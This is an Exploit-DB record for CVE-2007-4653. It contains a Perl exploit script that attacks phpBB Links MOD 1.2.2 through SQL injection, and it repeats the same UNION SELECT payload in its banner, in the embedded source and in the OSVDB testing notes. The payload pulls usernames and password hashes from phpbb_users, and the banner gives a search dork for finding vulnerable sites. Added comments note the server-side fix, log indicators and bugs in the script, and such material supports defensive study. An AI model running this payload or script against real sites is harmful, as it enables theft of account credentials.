ID EDB-ID:4346
Type exploitdb
Reporter Don
Modified 2007-08-31T00:00:00
Description
phpBB Links MOD 1.2.2 Remote SQL Injection Exploit. CVE-2007-4653. Webapps exploit for php platform
#!/usr/bin/perl
# Proof-of-concept for CVE-2007-4653: SQL injection through the `start`
# parameter of links.php (search action) in the Links MOD <= 1.2.2 for
# phpBB <= 2.0.22. The script prompts for a host, a forum directory and a
# user id, sends one HTTP GET request, and prints the first 32-character
# word token found in the response.
#
# NOTE(review): the script runs without `use strict` / `use warnings`; every
# variable below is a package global.

# Banner only; the text inside q{} is printed verbatim.
print q{
phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit
Bug discovered by Don
Dork: allinurl:links.php?t=search
or: "Links MOD v1.2.2 by phpBB2.de"
SQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*
};
use IO::Socket;
# Three interactive prompts follow (host, forum directory, user id). None of
# the values read from STDIN is validated before it is placed in the request.
print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
# chop removes the final character unconditionally (chomp would remove only a
# trailing newline), so input that does not end in a newline loses a character.
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
# Leftover code: the if-block is empty, and $myuser / $mypass / $myid are
# assigned from @ARGV but never read anywhere later in the script.
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
# Strip every literal "http://" from the host input. The replacement is empty,
# so the /e (evaluate replacement as code) flag has no useful effect here.
$server =~ s/(http:\/\/)//eg;
$path = $dir;
# Build the request path. The prompted user id is appended unescaped to the
# `start` query parameter; per the CVE description, links.php lets the value of
# `start` reach its SQL query, so the UNION SELECT below is executed against
# phpbb_users and returns the username and user_password columns.
# Defensive notes: the server-side remedy is to force `start` to an integer
# before it is used (patch or remove the MOD). In web-server access logs, a
# request to links.php with t=search whose `start` value contains anything
# other than digits (here UNION, SELECT, phpbb_users and a trailing /*) is the
# indicator of this request. If such a request is found, treat the targeted
# account's stored password hash as disclosed.
$path .= "links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=".$user."/*";
print "
Exploit in process...\r\n";
# Plain TCP connection to port 80 (no TLS). new() returns undef on failure,
# which triggers the die with a fixed message and no error detail.
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
# Hand-written HTTP/1.1 GET. Only Host, Accept and Connection headers are
# sent (no User-Agent), which can help single out this traffic in server logs.
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
# Printed before any response is read, so this message does not indicate that
# the request succeeded.
print "Exploit finished!\r\n\r\n";
# Read the response line by line and stop at the first line containing a run
# of 32 word characters. \w matches letters, digits and underscore, not only
# hex digits, so any 32-character token in the page matches, not just an MD5
# digest; the username column selected above is never extracted.
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
# String comparison against "0": a 32-character capture can never equal it,
# so this condition is always true once the regex has matched.
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
# Terminate after the first matching line; the rest of the response is ignored.
exit();
}
}
# milw0rm.com [2007-08-31]
{"published": "2007-08-31T00:00:00", "id": "EDB-ID:4346", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "560f75068326588c7ae9cdda5a9440ac28fb5cadc949ab6240d5281ee8987c59", "description": "phpBB Links MOD 1.2.2 Remote SQL Injection Exploit. CVE-2007-4653. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/4346/", "lastseen": "2016-01-31T20:42:41", "edition": 1, "title": "phpBB Links MOD 1.2.2 - Remote SQL Injection Exploit", "osvdbidlist": ["38427"], "modified": "2007-08-31T00:00:00", "bulletinFamily": "exploit", "viewCount": 7, "cvelist": ["CVE-2007-4653"], "sourceHref": "https://www.exploit-db.com/download/4346/", "references": [], "reporter": "Don", "sourceData": "#!/usr/bin/perl\n\nprint q{\n\nphpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit\n\nBug discovered by Don\nDork: allinurl:links.php?t=search\n or: \"Links MOD v1.2.2 by phpBB2.de\"\nSQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*\n\n};\n\nuse IO::Socket;\n\nprint q{\n=> Insert URL\n=> without ( http )\n=> };\n$server = <STDIN>;\nchop ($server);\nprint q{\n=> Insert directory\n=> es: /forum/ - /phpBB2/\n=> };\n$dir = <STDIN>;\nchop ($dir);\nprint q{\n=> User ID\n=> Number:\n=> };\n$user = <STDIN>;\nchop ($user);\nif (!$ARGV[2]) {\n}\n$myuser = $ARGV[3];\n$mypass = $ARGV[4];\n$myid = $ARGV[5];\n$server =~ s/(http:\\/\\/)//eg;\n$path = $dir;\n$path .= \"links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=\".$user.\"/*\";\nprint \"\nExploit in process...\\r\\n\";\n$socket = IO::Socket::INET->new(\nProto => \"tcp\",\nPeerAddr => \"$server\",\nPeerPort => \"80\") || die \"Exploit failed\";\nprint 
\"Exploit\\r\\n\";\nprint \"in process...\\r\\n\";\nprint $socket \"GET $path HTTP/1.1\\r\\n\";\nprint $socket \"Host: $server\\r\\n\";\nprint $socket \"Accept: */*\\r\\n\";\nprint $socket \"Connection: close\\r\\n\\r\\n\";\nprint \"Exploit finished!\\r\\n\\r\\n\";\nwhile ($answer = <$socket>)\n{\nif ($answer =~/(\\w{32})/)\n{\nif ($1 ne 0) {\nprint \"MD5-Hash is: \".$1.\"\\r\\n\";\n}\nexit();\n}\n}\n\n# milw0rm.com [2007-08-31]\n", "objectVersion": "1.0"}
{"result": {"cve": [{"id": "CVE-2007-4653", "type": "cve", "title": "CVE-2007-4653", "description": "SQL injection vulnerability in links.php in the Links MOD 1.2.2 and earlier for phpBB 2.0.22 and earlier allows remote attackers to execute arbitrary SQL commands via the start parameter in a search action.", "published": "2007-09-04T18:17:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4653", "cvelist": ["CVE-2007-4653"], "lastseen": "2017-09-29T14:25:30"}], "osvdb": [{"id": "OSVDB:38427", "type": "osvdb", "title": "Links MOD for phpBB links.php search Action start Variable SQL Injection", "description": "## Manual Testing Notes\nlinks.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*\n## References:\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4346\n[CVE-2007-4653](https://vulners.com/cve/CVE-2007-4653)\nBugtraq ID: 25501\n", "published": "2007-08-31T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:38427", "cvelist": ["CVE-2007-4653"], "lastseen": "2017-04-28T13:20:34"}]}}